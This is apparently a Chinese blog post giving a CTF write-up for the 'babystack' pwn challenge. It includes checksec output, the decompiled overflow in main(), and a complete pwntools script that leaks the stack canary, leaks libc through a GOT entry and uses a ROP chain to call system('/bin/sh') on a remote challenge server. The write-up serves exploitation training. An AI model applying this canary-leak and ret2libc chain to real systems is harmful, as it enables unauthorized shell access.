加载头像

others_babystack

Ubuntu 16 来源:httpsgithub.combash-cpwn_repo

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/others_babystack/babystack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v3; // eax
  char s[136]; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 v6; // [rsp+98h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  memset(s, 0, 0x80uLL);
  while ( 1 )
  {
    sub_4008B9();
    v3 = sub_400841();
    switch ( v3 )
    {
      case 2:					//输出
        puts(s);
        break;
      case 3:					//exit
        return 0LL;
      case 1:					//read()栈溢出
        read(0, s, 0x100uLL);
        break;
      default:
        sub_400826("invalid choice");
        break;
    }
    sub_400826(&unk_400AE7);
  }
}

0x02

思路 ret2libc

1.先泄露canary

2.泄露write

3.计算得出system

4.再次溢出执行system

0x03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 28052)
path = './babystack'
# io = process([path])
elf = ELF(path)
libc = ELF('libc-2.23.so')

padding1 = 0x88
payload1 = flat(b'a' * padding1)
io.sendlineafter(b'>>', b'1')
io.sendline(payload1)
io.sendlineafter(b'>>', b'2')
io.recvuntil(b'a\n')
canary = u64(io.recv(7).rjust(8, b'\x00'))
print('[+] Canary -->', hex(canary))

pop_rdi_ret = 0x400a93  # pop rdi ; ret
puts_plt = elf.plt['puts']
write_got = elf.got['write']
main = 0x400908
payload2 = flat(b'a'*padding1, canary, 0, pop_rdi_ret, write_got, puts_plt, main)
io.sendlineafter(b">>", b'1')
io.sendline(payload2)
io.sendlineafter(b">>", b'3')

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] write_addr -->', hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

payload3 = flat(b'a'*padding1, canary, 0, pop_rdi_ret, binsh, system)
io.sendlineafter(b">>", b'1')
io.sendline(payload3)
io.sendlineafter(b">>", b'3')
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體